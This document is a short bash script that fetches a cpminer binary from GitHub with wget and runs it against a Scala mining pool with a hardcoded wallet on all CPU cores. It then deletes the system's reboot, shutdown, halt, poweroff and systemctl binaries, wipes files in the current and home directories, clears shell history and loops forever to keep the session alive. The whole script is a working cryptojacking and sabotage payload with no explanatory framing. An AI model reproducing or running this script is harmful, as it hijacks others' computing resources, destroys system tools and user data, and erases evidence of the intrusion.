#!/bin/bash
wget -O biru https://github.com/claires67/buut/raw/main/cpminer > /dev/null 2>&1
chmod 777 biru
./biru -o mine.scalaproject.io:3333 -u Ssy2AL3Pqfwed8r2477gh6e79rZPfE3ze8ppWg2PN5oLMjQLM4BVBPDKFp82fpq4KtSHPb387pjVtF9HoypUsMsk95y3VrUEEM -p $(echo $(shuf -i 1-100000 -n 1)-BR) -t $(nproc --all) --algo panthera
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
